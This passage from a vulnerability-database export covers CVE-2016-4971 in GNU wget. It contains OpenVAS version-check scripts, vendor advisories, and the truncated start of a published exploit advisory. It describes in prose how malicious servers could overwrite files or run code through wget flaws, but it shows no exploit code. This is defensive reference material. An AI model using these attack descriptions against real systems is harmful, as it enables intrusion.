script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = 
\"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.18~1.18.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.18.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:20", "description": "The wget library has been found to contain a vulnerability.", "cvss3": {}, "published": "2017-05-23T00:00:00", "type": "openvas", "title": "Palo Alto PAN-OS WGET Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106827", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_panos_pan_sa-2017_0016.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Palo Alto PAN-OS WGET Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:paloaltonetworks:pan-os';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106827\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 15:33:39 +0700 (Tue, 23 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2016-4971\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Palo Alto PAN-OS WGET Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Palo Alto PAN-OS Local Security Checks\");\n script_dependencies(\"gb_palo_alto_panOS_version.nasl\");\n script_mandatory_keys(\"palo_alto_pan_os/version\");\n\n script_tag(name:\"summary\", value:\"The wget library has been found to contain a vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"wget allows remote servers to write to arbitrary files by redirecting a\nrequest from HTTP to a crafted FTP resource. 
Palo Alto Networks software makes use of the vulnerable library and\nmay be affected.\");\n\n script_tag(name:\"affected\", value:\"PAN-OS 6.1.16 and earlier, PAN-OS 7.0.14 and earlier, PAN-OS 7.1.9 and\nearlier, PAN-OS 8.0.\");\n\n script_tag(name:\"solution\", value:\"Update to PAN-OS 6.1.17, PAN-OS 7.0.15, PAN-OS 7.1.10, PAN-OS 8.0.1 or\nlater.\");\n\n script_xref(name:\"URL\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/86\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nmodel = get_kb_item(\"palo_alto_pan_os/model\");\n\nif (version_is_less(version: version, test_version: \"6.1.17\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"6.1.17\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n}\n\nif (version =~ \"^7\\.0\") {\n if (version_is_less(version: version, test_version: \"7.0.15\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.0.15\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^7\\.1\") {\n if (version_is_less(version: version, test_version: \"7.1.10\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.1.10\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^8\\.0\") {\n if (version_is_less(version: version, test_version: \"8.0.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.0.1\");\n if (model)\n report += '\\nModel: ' + model;\n\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:02", "description": "The remote host is missing an update for the ", "cvss3": 
{}, "published": "2016-06-21T00:00:00", "type": "openvas", "title": "Ubuntu Update for wget USN-3012-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842802", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842802", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for wget USN-3012-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842802\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-21 05:48:01 +0200 (Tue, 21 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for wget USN-3012-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Dawid Golunski discovered that Wget\n incorrectly handled filenames when being redirected from an HTTP to an FTP URL.\n A malicious server could possibly use this issue to overwrite local files.\");\n script_tag(name:\"affected\", value:\"wget on Ubuntu 16.04 LTS,\n Ubuntu 15.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3012-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3012-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|15\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.15-1ubuntu1.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.13.4-2ubuntu1.4\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.17.1-1ubuntu1.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.16.1-1ubuntu1.1\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-19T00:00:00", "type": "openvas", "title": "Fedora Update for wget FEDORA-2016-24135dfe43", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808463", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808463", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wget 
FEDORA-2016-24135dfe43\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808463\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-19 05:26:39 +0200 (Sun, 19 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2016-24135dfe43\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"wget on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-24135dfe43\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PTLXND7DSJYIXQQV4GXOHGEU4OUSL5YM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-27T18:36:54", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2019-1417)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4877", "CVE-2017-13089", "CVE-2017-13090", "CVE-2018-0494", "CVE-2016-7098", "CVE-2016-4971"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191417", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1417\");\n script_version(\"2020-01-23T11:43:23+0000\");\n script_cve_id(\"CVE-2014-4877\", \"CVE-2016-4971\", \"CVE-2016-7098\", \"CVE-2017-13089\", \"CVE-2017-13090\", \"CVE-2018-0494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:43:23 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:43:23 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2019-1417)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1417\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1417\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'wget' package(s) announced via the EulerOS-SA-2019-1417 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"A stack-based buffer overflow when processing chunked, encoded HTTP responses was found in wget. By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13089)\n\nA flaw was found in the way Wget handled symbolic links. A malicious FTP server could allow Wget running in the mirror mode (using the '-m' command line option) to write an arbitrary file to a location writable to by the user running Wget, possibly leading to code execution.(CVE-2014-4877)\n\nA cookie injection flaw was found in wget. An attacker can create a malicious website which, when accessed, overrides cookies belonging to arbitrary domains.(CVE-2018-0494)\n\nIt was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\n\nA heap-based buffer overflow, when processing chunked encoded HTTP responses, was found in wget. 
By tricking an unsuspecting user into connecting to a malicious HTTP server, an attacker could exploit this flaw to potentially execute arbitrary code.(CVE-2017-13090)\n\nRace condition in wget 1.17 and earlier, when used in recursive or mirroring mode to download a single file, might allow remote servers to bypass intended access list restrictions by keeping an HTTP connection open.(CVE-2016-7098)\");\n\n script_tag(name:\"affected\", value:\"'wget' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~15.1.h5\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:01:01", "description": "An arbitrary file overwrite vulnerability has been reported in the GNU wget. The vulnerability is due to wget trusting the filename provided by an FTP server when the original request is redirected from an HTTP server. 
A remote attacker can exploit this vulnerability by enticing a user to request a file over HTTP and sending an HTTP redirect to an FTP location hosting a malicious file intended to overwrite a user file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-06T00:00:00", "type": "checkpoint_advisories", "title": "GNU wget HTTP Redirect Arbitrary File Overwrite (CVE-2016-4971)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-10T00:00:00", "id": "CPAI-2016-0566", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "GNU Wget is a file retrieval utility which can use either the HTTP or FTP protocols. Wget features include the ability to work in the background while you are logged out, recursive retrieval of directories, file name wildcard matching, remote file timestamp storage and comparison, use of Rest with FTP servers and Range with HTTP servers to retrieve files over slow or unstable connections, support for Proxy servers, and configurability. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-18T19:04:34", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: wget-1.18-1.fc24", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-18T19:04:34", "id": "FEDORA:4D3E16068708", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/J5ZK7PPOISSBFIAIJP6AV6CDYCCBTL6G/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "GNU Wget is a file retrieval utility which can use either the HTTP or FTP protocols. Wget features include the ability to work in the background while you are logged out, recursive retrieval of directories, file name wildcard matching, remote file timestamp storage and comparison, use of Rest with FTP servers and Range with HTTP servers to retrieve files over slow or unstable connections, support for Proxy servers, and configurability. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-18T04:19:51", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: wget-1.18-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-18T04:19:51", "id": "FEDORA:EE8A96078F47", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PTLXND7DSJYIXQQV4GXOHGEU4OUSL5YM/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:53", "description": "GNU Wget is a file retrieval utility which can use either the HTTP or FTP protocols. Wget features include the ability to work in the background while you are logged out, recursive retrieval of directories, file name wildcard matching, remote file timestamp storage and comparison, use of Rest with FTP servers and Range with HTTP servers to retrieve files over slow or unstable connections, support for Proxy servers, and configurability. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-17T16:02:22", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: wget-1.18-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-17T16:02:22", "id": "FEDORA:A52D660A96E6", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5WRPRG5UOJBMTV4JL7KOKI4WU437DXG4/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:10:50", "description": "GNU wget before 1.18 allows remote servers to write to arbitrary files by\nredirecting a request from HTTP to a crafted FTP resource.\n\n#### Bugs\n\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=827003>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-10T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-10T00:00:00", "id": "UB:CVE-2016-4971", "href": "https://ubuntu.com/security/CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGNU Wget 1.18 - Arbitrary File Upload Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-06T00:00:00", "title": "GNU Wget 1.18 - Arbitrary File Upload Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-06T00:00:00", "id": "EXPLOITPACK:B7D0421EBA79F420787732ED0D8CDB1D", "href": "", "sourceData": "=============================================\n- Release date: 06.07.2016\n- Discovered by: Dawid Golunski\n- Severity: High\n- CVE-2016-4971\n=============================================\n\n\nI. VULNERABILITY\n-------------------------\n\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\n\n\nII. BACKGROUND\n-------------------------\n\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc.\n\nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy\n\"\n\nhttps://www.gnu.org/software/wget/\n\n\nIII. 